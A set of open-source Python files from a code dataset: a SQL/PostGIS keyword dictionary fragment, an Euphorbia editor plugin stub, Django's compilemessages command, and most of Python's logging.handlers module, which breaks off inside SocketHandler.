# 7.2. Management Functions
"*addgeometrycolumn", "*dropgeometrycolumn", "*dropgeometrytable", "*postgis_full_version",
"*postgis_geos_version", "*postgis_libxml_version", "*postgis_lib_build_date",
"*postgis_lib_version", "*postgis_proj_version", "*postgis_scripts_build_date",
"*postgis_scripts_installed", "*postgis_scripts_released", "*postgis_uses_stats", "*postgis_version",
"*populate_geometry_columns", "*probe_geometry_columns", "*updategeometrysrid",
# 7.3. Geometry Constructors
"*ST_bdpolyfromtext", "*ST_bdmpolyfromtext", "*ST_geogfromtext", "*ST_geographyfromtext",
"*ST_geogfromwkb", "*ST_geomcollfromtext", "*ST_geomfromewkb", "*ST_geomfromewkt",
"*ST_geometryfromtext", "*ST_geomfromgml", "*ST_geomfromkml", "*ST_gmltosql", "*ST_geomfromtext",
"*ST_geomfromwkb", "*ST_linefrommultipoint", "*ST_linefromtext", "*ST_linefromwkb",
"*ST_linestringfromwkb", "*ST_makebox2d", "*ST_makebox3d", "ST_MakeLine", "*ST_makeenvelope",
"ST_MakePolygon", "ST_MakePoint", "ST_MakePointM", "*ST_MLinefromtext", "*ST_mpointfromtext",
"*ST_mpolyfromtext", "ST_Point", "*ST_pointfromtext", "*ST_pointfromwkb", "ST_Polygon",
"*ST_polygonfromtext", "*ST_wkbtosql", "*ST_wkttosql",
# 7.4. Geometry Accessors
"GeometryType", "ST_Boundary", "*ST_coorddim", "ST_Dimension", "ST_EndPoint", "ST_Envelope",
"ST_ExteriorRing", "ST_GeometryN", "ST_GeometryType", "ST_InteriorRingN", "ST_isClosed",
"ST_isEmpty", "ST_isRing", "ST_isSimple", "ST_isValid", "ST_isValidReason", "ST_M", "ST_NDims",
"ST_NPoints", "ST_NRings", "ST_NumGeometries", "ST_NumInteriorrings", "ST_NumInteriorring",
"ST_NumPoints", "ST_PointN", "ST_Srid", "ST_StartPoint", "ST_Summary", "ST_X", "ST_Y", "ST_Z",
"*ST_zmflag",
# 7.5. Geometry Editors
"ST_AddPoint", "ST_Affine", "ST_Force2D", "*ST_Force3D", "*ST_Force3dZ", "*ST_Force3DM",
"*ST_Force_4d", "*ST_force_collection", "*ST_forcerhr", "*ST_linemerge", "*ST_collectionextract",
"ST_Multi", "*ST_removepoint", "*ST_reverse", "*ST_rotate", "*ST_rotatex", "*ST_rotatey",
"*ST_rotatez", "*ST_scale", "*ST_segmentize", "*ST_setpoint", "ST_SetSrid", "ST_SnapToGrid",
"ST_Transform", "ST_Translate", "*ST_transscale",
# 7.6. Geometry Outputs
"*ST_asbinary", "*ST_asewkb", "*ST_asewkt", "*ST_asgeojson", "*ST_asgml", "*ST_ashexewkb", "*ST_askml",
"*ST_assvg", "*ST_geohash", "ST_Astext",
# 7.7. Operators
# 7.8. Spatial Relationships and Measurements
"ST_Area", "ST_Azimuth", "ST_Centroid", "ST_ClosestPoint", "ST_Contains", "ST_ContainsProperly",
"ST_Covers", "ST_CoveredBy", "ST_Crosses", "*ST_linecrossingdirection", "ST_Cisjoint",
"ST_Distance", "*ST_hausdorffdistance", "*ST_maxdistance", "ST_Distance_Sphere",
"ST_Distance_Spheroid", "*ST_DFullyWithin", "ST_DWithin", "ST_Equals", "*ST_hasarc",
"ST_Intersects", "ST_Length", "*ST_Length2d", "*ST_length3d", "ST_Length_Spheroid",
"*ST_length2d_spheroid", "*ST_length3d_spheroid", "*ST_longestline", "*ST_orderingequals",
"ST_Overlaps", "*ST_perimeter", "*ST_perimeter2d", "*ST_perimeter3d", "ST_PointOnSurface",
"ST_Relate", "ST_ShortestLine", "ST_Touches", "ST_Within",
# 7.9. Geometry Processing Functions
"ST_Buffer", "ST_BuildArea", "ST_Collect", "ST_ConvexHull", "*ST_curvetoline", "ST_Difference",
"ST_Dump", "*ST_dumppoints", "*ST_dumprings", "ST_Intersection", "*ST_linetocurve", "*ST_memunion",
"*ST_minimumboundingcircle", "*ST_polygonize", "*ST_shift_longitude", "ST_Simplify",
"ST_SimplifyPreserveTopology", "ST_SymDifference", "ST_Union",
# 7.10. Linear Referencing
"ST_Line_Interpolate_Point", "ST_Line_Locate_Point", "ST_Line_Substring",
"*ST_locate_along_measure", "*ST_locate_between_measures", "*ST_locatebetweenelevations",
"*ST_addmeasure",
# 7.11. Long Transactions Support
"*addauth", "*checkauth", "*disablelongtransactions", "*enablelongtransactions", "*lockrow",
"*unlockrows",
# 7.12. Miscellaneous Functions
"*ST_accum", "*box2d", "*box3d", "*ST_estimated_extent", "*ST_expand", "ST_Extent", "*ST_extent3d",
"*find_srid", "*ST_mem_size", "*ST_point_inside_circle", "ST_XMax", "ST_XMin", "ST_YMax", "ST_YMin",
"ST_ZMax", "ST_ZMin",
# 7.13. Exceptional Functions
"*postgis_addbbox", "*postgis_dropbbox", "*postgis_hasbbox"
]
# constants
constants = ["null", "false", "true"]
postgis_constants = []
def getSqlDictionary(spatial=True):
def strip_star(s):
if s[0] == '*':
return s.lower()[1:]
else:
return s.lower()
k, c, f = list(keywords), list(constants), list(functions)
if spatial:
k += postgis_keywords
f += postgis_functions
c += postgis_constants
return {'keyword': list(map(strip_star, k)), 'constant': list(map(strip_star, c)), 'function': list(map(strip_star, f))}
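# Illustrative usage (not part of the original module): the mapping returned
# above groups lower-cased names (leading '*' stripped) by category, e.g.
#   getSqlDictionary(spatial=False)['keyword'][:3]  ->  ['action', 'add', 'after']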
def getQueryBuilderDictionary():
# concat functions
def ff(l):
return [s for s in l if s[0] != '*']
def add_paren(l):
return [s + "(" for s in l]
foo = sorted(add_paren(ff(list(set.union(set(functions), set(postgis_functions))))))
m = sorted(add_paren(ff(math_functions)))
agg = sorted(add_paren(ff(aggregate_functions)))
op = ff(operators)
s = sorted(add_paren(ff(string_functions)))
return {'function': foo, 'math': m, 'aggregate': agg, 'operator': op, 'string': s}
|
gpl-2.0
|
cvkbtzx/euphorbia
|
EuphorbiaEditor/exts/euphorbia.py
|
1
|
1300
|
#-*- coding:utf-8 -*-
## EUPHORBIA - GTK LaTeX Editor
## Module: EuphorbiaEditor.exts.euphorbia
## Copyright (C) 2008-2011 Bzoloid
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software Foundation,
## Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Euphorbia plugin wrapper."""
from ..ui.palette import Palette
from ..ui.tabwrapper import TabWrapper
app = None
#------------------------------------------------------------------------------
class Plugin(object):
def __init__(self):
self.app = app
def activate(self):
pass
def deactivate(self):
pass
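# Illustrative sketch (not part of the original module): a concrete plugin
# would typically subclass Plugin and override the hook methods, e.g.
#
#     class ExamplePlugin(Plugin):
#         def activate(self):
#             pass    # set up UI elements here, using self.app
#         def deactivate(self):
#             pass    # undo whatever activate() did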
#------------------------------------------------------------------------------
|
gpl-2.0
|
georgemarshall/django
|
django/core/management/commands/compilemessages.py
|
33
|
6223
|
import codecs
import concurrent.futures
import glob
import os
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, is_ignored_path, popen_wrapper,
)
def has_bom(fn):
with open(fn, 'rb') as f:
sample = f.read(4)
return sample.startswith((codecs.BOM_UTF8, codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE))
def is_writable(path):
# Known side effect: updating file access/modified time to current time if
# it is writable.
try:
with open(path, 'a'):
os.utime(path, None)
except OSError:
return False
return True
class Command(BaseCommand):
help = 'Compiles .po files to .mo files for use with builtin gettext support.'
requires_system_checks = False
program = 'msgfmt'
program_options = ['--check-format']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', action='append', default=[],
help='Locale(s) to process (e.g. de_AT). Default is to process all. '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', action='append', default=[],
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--use-fuzzy', '-f', dest='fuzzy', action='store_true',
help='Use fuzzy translations.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
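    # Example invocation (illustrative, not part of the original module):
    #   django-admin compilemessages --locale de_AT --exclude fr --use-fuzzy \
    #       --ignore "cache/*"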
def handle(self, **options):
locale = options['locale']
exclude = options['exclude']
ignore_patterns = set(options['ignore_patterns'])
self.verbosity = options['verbosity']
if options['fuzzy']:
self.program_options = self.program_options + ['-f']
if find_command(self.program) is None:
raise CommandError("Can't find %s. Make sure you have GNU gettext "
"tools 0.15 or newer installed." % self.program)
basedirs = [os.path.join('conf', 'locale'), 'locale']
if os.environ.get('DJANGO_SETTINGS_MODULE'):
from django.conf import settings
basedirs.extend(settings.LOCALE_PATHS)
# Walk entire tree, looking for locale directories
for dirpath, dirnames, filenames in os.walk('.', topdown=True):
for dirname in dirnames:
if is_ignored_path(os.path.normpath(os.path.join(dirpath, dirname)), ignore_patterns):
dirnames.remove(dirname)
elif dirname == 'locale':
basedirs.append(os.path.join(dirpath, dirname))
# Gather existing directories.
basedirs = set(map(os.path.abspath, filter(os.path.isdir, basedirs)))
if not basedirs:
raise CommandError("This script should be run from the Django Git "
"checkout or your project or app tree, or with "
"the settings module specified.")
# Build locale list
all_locales = []
for basedir in basedirs:
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % basedir))
all_locales.extend(map(os.path.basename, locale_dirs))
# Account for excluded locales
locales = locale or all_locales
locales = set(locales).difference(exclude)
self.has_errors = False
for basedir in basedirs:
if locales:
dirs = [os.path.join(basedir, l, 'LC_MESSAGES') for l in locales]
else:
dirs = [basedir]
locations = []
for ldir in dirs:
for dirpath, dirnames, filenames in os.walk(ldir):
locations.extend((dirpath, f) for f in filenames if f.endswith('.po'))
if locations:
self.compile_messages(locations)
if self.has_errors:
raise CommandError('compilemessages generated one or more errors.')
def compile_messages(self, locations):
"""
Locations is a list of tuples: [(directory, file), ...]
"""
with concurrent.futures.ThreadPoolExecutor() as executor:
futures = []
for i, (dirpath, f) in enumerate(locations):
if self.verbosity > 0:
self.stdout.write('processing file %s in %s\n' % (f, dirpath))
po_path = os.path.join(dirpath, f)
if has_bom(po_path):
self.stderr.write(
'The %s file has a BOM (Byte Order Mark). Django only '
'supports .po files encoded in UTF-8 and without any BOM.' % po_path
)
self.has_errors = True
continue
base_path = os.path.splitext(po_path)[0]
# Check writability on first location
if i == 0 and not is_writable(base_path + '.mo'):
self.stderr.write(
'The po files under %s are in a seemingly not writable location. '
'mo files will not be updated/created.' % dirpath
)
self.has_errors = True
return
args = [self.program] + self.program_options + [
'-o', base_path + '.mo', base_path + '.po'
]
futures.append(executor.submit(popen_wrapper, args))
for future in concurrent.futures.as_completed(futures):
output, errors, status = future.result()
if status:
if self.verbosity > 0:
if errors:
self.stderr.write("Execution of %s failed: %s" % (self.program, errors))
else:
self.stderr.write("Execution of %s failed" % self.program)
self.has_errors = True
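# Editor's usage sketch (not part of Django itself): in a configured project
# the command above can also be driven from Python via call_command; the
# locale codes and ignore pattern below are illustrative assumptions.
def _example_compilemessages():
    from django.core.management import call_command
    call_command(
        'compilemessages',
        locale=['de', 'de_AT'],              # only these catalogs
        ignore_patterns=['node_modules/*'],  # assumed directories to skip
        verbosity=1,
    )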
|
bsd-3-clause
|
mm112287/2015cda-24
|
static/Brython3.1.1-20150328-091302/Lib/logging/handlers.py
|
736
|
55579
|
# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import errno, logging, socket, os, pickle, struct, time, re
from codecs import BOM_UTF8
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
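# Editor's sketch (not part of the stdlib module): the 'namer' and 'rotator'
# hooks documented above can be used to compress rotated files. The helper is
# purely illustrative and is never called by the module itself.
def _example_gzip_rotation(handler):
    import gzip
    def namer(default_name):
        # rotated files get a .gz suffix, e.g. app.log.1.gz
        return default_name + ".gz"
    def rotator(source, dest):
        # compress the old log into dest, then drop the uncompressed source
        with open(source, "rb") as sf, gzip.open(dest, "wb") as df:
            df.write(sf.read())
        os.remove(source)
    handler.namer = namer
    handler.rotator = rotator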
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
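# Editor's usage sketch (not part of the original module): size-based rollover
# as described in RotatingFileHandler.__init__ above. The file name "app.log"
# and the 1 MiB / 5 backups figures are illustrative assumptions.
def _example_rotating_file_handler():
    logger = logging.getLogger("example.rotating")
    logger.addHandler(RotatingFileHandler("app.log", maxBytes=1024 * 1024, backupCount=5))
    logger.warning("appended to app.log; older data rolls to app.log.1 .. app.log.5")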
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
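# Editor's usage sketch (not part of the original module): midnight rollover
# keeping a week of backups, per the 'when' codes documented in __init__ above.
def _example_timed_rotating_file_handler():
    logger = logging.getLogger("example.timed")
    logger.setLevel(logging.INFO)
    logger.addHandler(TimedRotatingFileHandler("timed.log", when="midnight", backupCount=7))
    logger.info("rotated copies are suffixed with %Y-%m-%d and pruned after 7 rollovers")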
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except OSError as err:
if err.errno == errno.ENOENT:
sres = None
else:
raise
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
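# Editor's usage sketch (not part of the original module): on Unix hosts where
# an external tool such as logrotate replaces the log file, the handler
# reopens it automatically, as the class docstring explains. The path below is
# a placeholder assumption.
def _example_watched_file_handler():
    logger = logging.getLogger("example.watched")
    logger.addHandler(WatchedFileHandler("/var/log/myapp.log"))
    logger.warning("written to the current /var/log/myapp.log, even after rotation")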
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(s, 'settimeout'):
s.settimeout(timeout)
try:
s.connect((self.host, self.port))
return s
except socket.error:
s.close()
raise
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except socket.error:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
if hasattr(self.sock, "sendall"):
self.sock.sendall(s)
else: #pragma: no cover
sentsofar = 0
left = len(s)
while left > 0:
sent = self.sock.send(s[sentsofar:])
sentsofar = sentsofar + sent
left = left - sent
except socket.error: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def close(self):
"""
Closes the socket.
